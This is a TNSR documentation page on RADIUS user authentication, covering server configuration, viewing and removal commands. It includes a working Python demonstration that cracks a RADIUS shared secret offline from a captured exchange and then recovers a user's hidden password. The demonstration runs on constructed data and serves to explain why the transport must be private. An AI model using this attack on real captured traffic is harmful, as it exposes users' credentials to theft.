RADIUS User Authentication¶
TNSR supports authenticating users against a Remote Authentication Dial-In User Service (RADIUS) server. Though RADIUS was originally designed for dial-up user authentication, it fills numerous authentication roles on modern networks thanks to vendor extensions to the protocol over the years. Organizations commonly use RADIUS servers for centralized authentication because it is widely supported as the back end for IEEE 802.1X (including WPA2-Enterprise wireless), IPsec, and many other protocols.
Danger
Communication between a RADIUS server and a host authenticating against it, such as TNSR, must be kept private. In other words, this communication should take place over a VPN, a directly connected secure network, or a similar protected path. The RADIUS protocol itself is not encrypted: only the User-Password attribute is obfuscated, using an MD5-based scheme keyed by the shared secret that anyone who obtains or guesses the secret can reverse, and the rest of each packet, including usernames, is sent in the clear, which could expose sensitive user information. Use a long, random shared secret and keep it away from untrusted parties.
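To make the warning above concrete, here is an added example written for this page (not TNSR's own code, and not taken from any RADIUS implementation). It builds an RFC 2865 Access-Request and Access-Accept with a constructed username, password and a deliberately weak shared secret, then shows what a passive observer of an unprotected transport can do: read the User-Name directly, test guesses for the shared secret offline against the Response Authenticator, and with the recovered secret undo the User-Password hiding. The identifiers, addresses and secrets are all made up for the example.

```python
import hashlib
import secrets
import socket
import struct

# RFC 2865 packet codes and attribute types used in this example.
ACCESS_REQUEST, ACCESS_ACCEPT = 1, 2
ATTR_USER_NAME, ATTR_USER_PASSWORD, ATTR_NAS_IP_ADDRESS = 1, 2, 4
HEADER_LEN = 20  # code (1) + identifier (1) + length (2) + authenticator (16)


def _keystream_xor(data: bytes, secret: bytes, request_auth: bytes, decrypt: bool) -> bytes:
    """RFC 2865 section 5.2 User-Password hiding: each 16-byte block is XORed with
    MD5(secret + previous ciphertext block); the first block is keyed by the Request
    Authenticator. Hiding and revealing differ only in which side feeds the next key."""
    out, prev = b"", request_auth
    for i in range(0, len(data), 16):
        block = data[i:i + 16]
        key = hashlib.md5(secret + prev).digest()
        xored = bytes(a ^ b for a, b in zip(block, key))
        out += xored
        prev = block if decrypt else xored
    return out


def hide_password(password: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """NUL-pad to a multiple of 16 bytes (at least 16), then apply the hiding."""
    padded_len = max(16, (len(password) + 15) // 16 * 16)
    return _keystream_xor(password.ljust(padded_len, b"\x00"), secret, request_auth, False)


def reveal_password(hidden: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """Anyone holding (or guessing) the shared secret can undo the hiding."""
    return _keystream_xor(hidden, secret, request_auth, True).rstrip(b"\x00")


def attribute(attr_type: int, value: bytes) -> bytes:
    """One attribute: Type (1 byte), Length (1 byte, counting itself and Type), Value."""
    return struct.pack("!BB", attr_type, len(value) + 2) + value


def build_access_request(ident: int, secret: bytes, username: bytes, password: bytes,
                         nas_ip: str, request_auth: bytes) -> bytes:
    """An Access-Request as a NAS would send it: only User-Password is hidden."""
    attrs = (attribute(ATTR_USER_NAME, username)
             + attribute(ATTR_USER_PASSWORD, hide_password(password, secret, request_auth))
             + attribute(ATTR_NAS_IP_ADDRESS, socket.inet_aton(nas_ip)))
    header = struct.pack("!BBH", ACCESS_REQUEST, ident, HEADER_LEN + len(attrs))
    return header + request_auth + attrs


def build_access_accept(ident: int, secret: bytes, request_auth: bytes, attrs: bytes = b"") -> bytes:
    """Server reply; its authenticator is MD5(Code+ID+Length+RequestAuth+Attributes+Secret),
    which gives an eavesdropper an offline oracle for secret guesses."""
    header = struct.pack("!BBH", ACCESS_ACCEPT, ident, HEADER_LEN + len(attrs))
    return header + hashlib.md5(header + request_auth + attrs + secret).digest() + attrs


def parse_packet(pkt: bytes):
    """Return (code, identifier, authenticator, [(type, value), ...]) with bounds checks."""
    if len(pkt) < HEADER_LEN:
        raise ValueError("packet shorter than RADIUS header")
    code, ident, length = struct.unpack("!BBH", pkt[:4])
    if length < HEADER_LEN or length > len(pkt):
        raise ValueError("bad RADIUS length field")
    attrs, pos = [], HEADER_LEN
    while pos < length:
        if pos + 2 > length or pkt[pos + 1] < 2 or pos + pkt[pos + 1] > length:
            raise ValueError("malformed attribute")
        attr_len = pkt[pos + 1]
        attrs.append((pkt[pos], pkt[pos + 2:pos + attr_len]))
        pos += attr_len
    return code, ident, pkt[4:HEADER_LEN], attrs


def crack_secret(request: bytes, response: bytes, candidates):
    """Offline dictionary attack on the shared secret from a captured request/response pair."""
    _, _, request_auth, _ = parse_packet(request)
    length = struct.unpack("!H", response[2:4])[0]
    header, response_auth, attrs = response[:4], response[4:HEADER_LEN], response[HEADER_LEN:length]
    for candidate in candidates:
        if hashlib.md5(header + request_auth + attrs + candidate).digest() == response_auth:
            return candidate
    return None


def demo():
    """Constructed exchange: weak secret, cleartext username, recoverable password."""
    secret = b"abcd1234"  # constructed and deliberately weak
    request_auth = secrets.token_bytes(16)
    req = build_access_request(7, secret, b"alice", b"correct horse", "198.51.100.30", request_auth)
    resp = build_access_accept(7, secret, request_auth)
    fields = dict(parse_packet(req)[3])
    username = fields[ATTR_USER_NAME]  # readable without any secret at all
    guessed = crack_secret(req, resp, [b"radius", b"testing123", b"abcd1234"])
    password = reveal_password(fields[ATTR_USER_PASSWORD], guessed, request_auth)
    return username, guessed, password


if __name__ == "__main__":
    print(demo())  # (b'alice', b'abcd1234', b'correct horse')
```

The dictionary attack needs nothing but a captured exchange, which is exactly what an unprotected network path hands out; a long random secret defeats the guessing, and a private transport denies the capture in the first place.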
Adding a RADIUS Server¶
To define a RADIUS server, start in config mode and use the radius command to enter config-radius mode:
tnsr(config)# radius
tnsr(config-radius)#
Now define one or more RADIUS servers using the server command:
tnsr(config-radius)# server name <name> host <address> [port <auth-port>] secret <secret>
[timeout <timeout:3-60>] [source-address <ip-addr>]
The server command accepts the following parameters:
name <name>
    The name of the RADIUS server, such as primary.
host <address>
    The IP address or FQDN of the server, such as radius.example.com.
port <auth-port>
    Optional custom authentication port. When not defined, TNSR assumes the default RADIUS authentication port, 1812.
secret <secret>
    The shared secret between this host and the RADIUS server. This must consist of printable ASCII characters and cannot contain spaces or quotes.
timeout <timeout>
    Optional duration, in seconds, after which a query times out. The value can be between 3 and 60 seconds.
source-address <ip-addr>
    Optional IP address TNSR will use as the source address when communicating with this RADIUS server.
The server command can be repeated with additional servers for redundancy.
Note
This only defines the RADIUS server. TNSR will not use the server unless it is added to an authentication server group. That group must then be configured for use elsewhere, such as for system user authentication.
Example¶
This example adds two RADIUS servers named primary and secondary. The secrets shown are short placeholders for illustration only; in production use long, random shared secrets.
tnsr(config-radius)# server name primary host 198.51.100.3 secret abcd1234 timeout 30 source-address 198.51.100.30
tnsr(config-radius)# server name secondary host 198.51.100.7 secret efgh5678
Viewing RADIUS Servers¶
tnsr(config)# show radius servers
Name       Host           Secret       Timeout  Source-Address
primary    198.51.100.3   "abcd1234"   30       198.51.100.30
secondary  198.51.100.7   "efgh5678"
The shared secrets are displayed in plain text, so restrict access to the TNSR configuration and to this command accordingly.
Removing a RADIUS Server¶
To remove a RADIUS server, start in config-radius mode and negate its entry with the no form of the server command along with the name of the entry:
tnsr(config-radius)# no server name <name>
For example:
tnsr(config-radius)# no server name secondary